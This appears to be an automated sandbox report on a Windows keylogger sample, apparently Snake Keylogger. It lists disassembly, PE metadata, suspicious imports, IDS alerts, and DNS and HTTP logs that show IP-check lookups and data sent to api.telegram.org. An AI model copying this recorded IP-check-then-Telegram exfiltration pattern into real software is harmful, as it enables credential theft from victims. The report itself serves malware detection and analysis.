test esi, 00000003h
jne 00007F2530528C7Dh
bt edi, 02h
jnc 00007F2530528AEFh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F2530528AF3h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F2530528B45h
bt esi, 03h
jnc 00007F2530528B98h
Programming Language:
• [ASM] VS2013 build 21005
• [ C ] VS2013 build 21005
• [C++] VS2013 build 21005
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [ASM] VS2013 UPD4 build 31101
• [RES] VS2013 build 21005
• [LNK] VS2013 UPD4 build 31101
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xba44c | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc7000 | 0x41eb4 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x109000 | 0x711c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4870 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8dcc4 | 0x8de00 | d28a820a1d9ff26cda02d12b888ba4b4 | False | 0.5728679102422908 | data | 6.676118058520316 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8f000 | 0x2e10e | 0x2e200 | 79b14b254506b0dbc8cd0ad67fb70ad9 | False | 0.33535526761517614 | OpenPGP Public Key | 5.76010872795207 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xbe000 | 0x8f74 | 0x5200 | 9f9d6f746f1a415a63de45f8b7983d33 | False | 0.1017530487804878 | data | 1.198745897703538 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc7000 | 0x41eb4 | 0x42000 | 99b61265119403e58ec1b6b503fb1b26 | False | 0.9000207149621212 | data | 7.829383341462867 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x109000 | 0x711c | 0x7200 | 6fcae3cbbf6bfbabf5ec5bbe7cf612c3 | False | 0.7650767543859649 | data | 6.779031650454199 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc75a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xc76d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xc77f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc7920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xc7c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xc7d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xc8bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xc9480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xc99e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xcbf90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xcd038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xcd4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xcd4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xcda84 | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xce110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xce5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xceb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xcf1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xcf660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xcf7b8 | 0x3917c | data | | | 1.0003463729196245
RT_GROUP_ICON | 0x108934 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x1089ac | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x1089c0 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x1089d4 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x1089e8 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x108ac4 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll | StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll | GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll | LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-26T02:45:16.025532+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49731 | 193.122.6.168 | 80 | TCP
2024-12-26T02:45:25.025525+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49731 | 193.122.6.168 | 80 | TCP
2024-12-26T02:45:26.543698+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.4 | 49739 | 149.154.167.220 | 443 | TCP
2024-12-26T02:45:27.144850+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.4 | 49739 | 149.154.167.220 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 26, 2024 02:45:02.341104984 CET | 49731 | 80 | 192.168.2.4 | 193.122.6.168
Dec 26, 2024 02:45:02.460660934 CET | 80 | 49731 | 193.122.6.168 | 192.168.2.4
Dec 26, 2024 02:45:02.460764885 CET | 49731 | 80 | 192.168.2.4 | 193.122.6.168
Dec 26, 2024 02:45:02.461193085 CET | 49731 | 80 | 192.168.2.4 | 193.122.6.168
Dec 26, 2024 02:45:02.580663919 CET | 80 | 49731 | 193.122.6.168 | 192.168.2.4
Dec 26, 2024 02:45:13.397192955 CET | 80 | 49731 | 193.122.6.168 | 192.168.2.4
Dec 26, 2024 02:45:13.401732922 CET | 49731 | 80 | 192.168.2.4 | 193.122.6.168
Dec 26, 2024 02:45:13.521349907 CET | 80 | 49731 | 193.122.6.168 | 192.168.2.4
Dec 26, 2024 02:45:15.982127905 CET | 80 | 49731 | 193.122.6.168 | 192.168.2.4
Dec 26, 2024 02:45:16.025532007 CET | 49731 | 80 | 192.168.2.4 | 193.122.6.168
Dec 26, 2024 02:45:16.330734015 CET | 49733 | 443 | 192.168.2.4 | 172.67.177.134
Dec 26, 2024 02:45:16.330847979 CET | 443 | 49733 | 172.67.177.134 | 192.168.2.4
Dec 26, 2024 02:45:16.330929995 CET | 49733 | 443 | 192.168.2.4 | 172.67.177.134
Dec 26, 2024 02:45:16.340625048 CET | 49733 | 443 | 192.168.2.4 | 172.67.177.134
Dec 26, 2024 02:45:16.340661049 CET | 443 | 49733 | 172.67.177.134 | 192.168.2.4
Dec 26, 2024 02:45:17.558651924 CET | 443 | 49733 | 172.67.177.134 | 192.168.2.4
Dec 26, 2024 02:45:17.558741093 CET | 49733 | 443 | 192.168.2.4 | 172.67.177.134
Dec 26, 2024 02:45:17.564469099 CET | 49733 | 443 | 192.168.2.4 | 172.67.177.134
Dec 26, 2024 02:45:17.564506054 CET | 443 | 49733 | 172.67.177.134 | 192.168.2.4
Dec 26, 2024 02:45:17.564842939 CET | 443 | 49733 | 172.67.177.134 | 192.168.2.4
Dec 26, 2024 02:45:17.606256008 CET | 49733 | 443 | 192.168.2.4 | 172.67.177.134
Dec 26, 2024 02:45:17.616568089 CET | 49733 | 443 | 192.168.2.4 | 172.67.177.134
Dec 26, 2024 02:45:17.659333944 CET | 443 | 49733 | 172.67.177.134 | 192.168.2.4
Dec 26, 2024 02:45:18.000567913 CET | 443 | 49733 | 172.67.177.134 | 192.168.2.4
Dec 26, 2024 02:45:18.000618935 CET | 443 | 49733 | 172.67.177.134 | 192.168.2.4
Dec 26, 2024 02:45:18.000698090 CET | 49733 | 443 | 192.168.2.4 | 172.67.177.134
Dec 26, 2024 02:45:18.006686926 CET | 49733 | 443 | 192.168.2.4 | 172.67.177.134
Dec 26, 2024 02:45:23.131849051 CET | 49731 | 80 | 192.168.2.4 | 193.122.6.168
Dec 26, 2024 02:45:23.251398087 CET | 80 | 49731 | 193.122.6.168 | 192.168.2.4
Dec 26, 2024 02:45:24.981524944 CET | 80 | 49731 | 193.122.6.168 | 192.168.2.4
Dec 26, 2024 02:45:25.025525093 CET | 49731 | 80 | 192.168.2.4 | 193.122.6.168
Dec 26, 2024 02:45:25.123151064 CET | 49739 | 443 | 192.168.2.4 | 149.154.167.220
Dec 26, 2024 02:45:25.123192072 CET | 443 | 49739 | 149.154.167.220 | 192.168.2.4
Dec 26, 2024 02:45:25.123260975 CET | 49739 | 443 | 192.168.2.4 | 149.154.167.220
Dec 26, 2024 02:45:25.123686075 CET | 49739 | 443 | 192.168.2.4 | 149.154.167.220
Dec 26, 2024 02:45:25.123701096 CET | 443 | 49739 | 149.154.167.220 | 192.168.2.4
Dec 26, 2024 02:45:26.489178896 CET | 443 | 49739 | 149.154.167.220 | 192.168.2.4
Dec 26, 2024 02:45:26.489362001 CET | 49739 | 443 | 192.168.2.4 | 149.154.167.220
Dec 26, 2024 02:45:26.493030071 CET | 49739 | 443 | 192.168.2.4 | 149.154.167.220
Dec 26, 2024 02:45:26.493058920 CET | 443 | 49739 | 149.154.167.220 | 192.168.2.4
Dec 26, 2024 02:45:26.493302107 CET | 443 | 49739 | 149.154.167.220 | 192.168.2.4
Dec 26, 2024 02:45:26.502451897 CET | 49739 | 443 | 192.168.2.4 | 149.154.167.220
Dec 26, 2024 02:45:26.543376923 CET | 443 | 49739 | 149.154.167.220 | 192.168.2.4
Dec 26, 2024 02:45:26.543481112 CET | 49739 | 443 | 192.168.2.4 | 149.154.167.220
Dec 26, 2024 02:45:26.543500900 CET | 443 | 49739 | 149.154.167.220 | 192.168.2.4
Dec 26, 2024 02:45:27.144900084 CET | 443 | 49739 | 149.154.167.220 | 192.168.2.4
Dec 26, 2024 02:45:27.144972086 CET | 443 | 49739 | 149.154.167.220 | 192.168.2.4
Dec 26, 2024 02:45:27.145034075 CET | 49739 | 443 | 192.168.2.4 | 149.154.167.220
Dec 26, 2024 02:45:27.145536900 CET | 49739 | 443 | 192.168.2.4 | 149.154.167.220
Dec 26, 2024 02:46:29.981235027 CET | 80 | 49731 | 193.122.6.168 | 192.168.2.4
Dec 26, 2024 02:46:29.984699011 CET | 49731 | 80 | 192.168.2.4 | 193.122.6.168
Dec 26, 2024 02:46:58.010858059 CET | 49731 | 80 | 192.168.2.4 | 193.122.6.168
Dec 26, 2024 02:46:58.130592108 CET | 80 | 49731 | 193.122.6.168 | 192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 26, 2024 02:45:02.197021961 CET | 59576 | 53 | 192.168.2.4 | 1.1.1.1
Dec 26, 2024 02:45:02.335547924 CET | 53 | 59576 | 1.1.1.1 | 192.168.2.4
Dec 26, 2024 02:45:16.019491911 CET | 53136 | 53 | 192.168.2.4 | 1.1.1.1
Dec 26, 2024 02:45:16.329998016 CET | 53 | 53136 | 1.1.1.1 | 192.168.2.4
Dec 26, 2024 02:45:24.985025883 CET | 60954 | 53 | 192.168.2.4 | 1.1.1.1
Dec 26, 2024 02:45:25.122526884 CET | 53 | 60954 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 26, 2024 02:45:02.197021961 CET | 192.168.2.4 | 1.1.1.1 | 0xb91d | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Dec 26, 2024 02:45:16.019491911 CET | 192.168.2.4 | 1.1.1.1 | 0x9bb0 | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Dec 26, 2024 02:45:24.985025883 CET | 192.168.2.4 | 1.1.1.1 | 0x686b | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 26, 2024 02:45:02.335547924 CET | 1.1.1.1 | 192.168.2.4 | 0xb91d | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 26, 2024 02:45:02.335547924 CET | 1.1.1.1 | 192.168.2.4 | 0xb91d | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Dec 26, 2024 02:45:02.335547924 CET | 1.1.1.1 | 192.168.2.4 | 0xb91d | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Dec 26, 2024 02:45:02.335547924 CET | 1.1.1.1 | 192.168.2.4 | 0xb91d | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Dec 26, 2024 02:45:02.335547924 CET | 1.1.1.1 | 192.168.2.4 | 0xb91d | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Dec 26, 2024 02:45:02.335547924 CET | 1.1.1.1 | 192.168.2.4 | 0xb91d | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Dec 26, 2024 02:45:16.329998016 CET | 1.1.1.1 | 192.168.2.4 | 0x9bb0 | No error (0) | reallyfreegeoip.org | | 172.67.177.134 | A (IP address) | IN (0x0001) | false
Dec 26, 2024 02:45:16.329998016 CET | 1.1.1.1 | 192.168.2.4 | 0x9bb0 | No error (0) | reallyfreegeoip.org | | 104.21.67.152 | A (IP address) | IN (0x0001) | false
Dec 26, 2024 02:45:25.122526884 CET | 1.1.1.1 | 192.168.2.4 | 0x686b | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
                                                                                            • reallyfreegeoip.org
                                                                                            • api.telegram.org
                                                                                            • checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49731 | 193.122.6.168 | 80 | 7348 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Dec 26, 2024 02:45:02.461193085 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Dec 26, 2024 02:45:13.397192955 CET | 273 | IN | HTTP/1.1 200 OK
Date: Thu, 26 Dec 2024 01:45:13 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Dec 26, 2024 02:45:13.401732922 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Dec 26, 2024 02:45:15.982127905 CET | 273 | IN | HTTP/1.1 200 OK
Date: Thu, 26 Dec 2024 01:45:15 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Dec 26, 2024 02:45:23.131849051 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Dec 26, 2024 02:45:24.981524944 CET | 273 | IN | HTTP/1.1 200 OK
Date: Thu, 26 Dec 2024 01:45:24 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
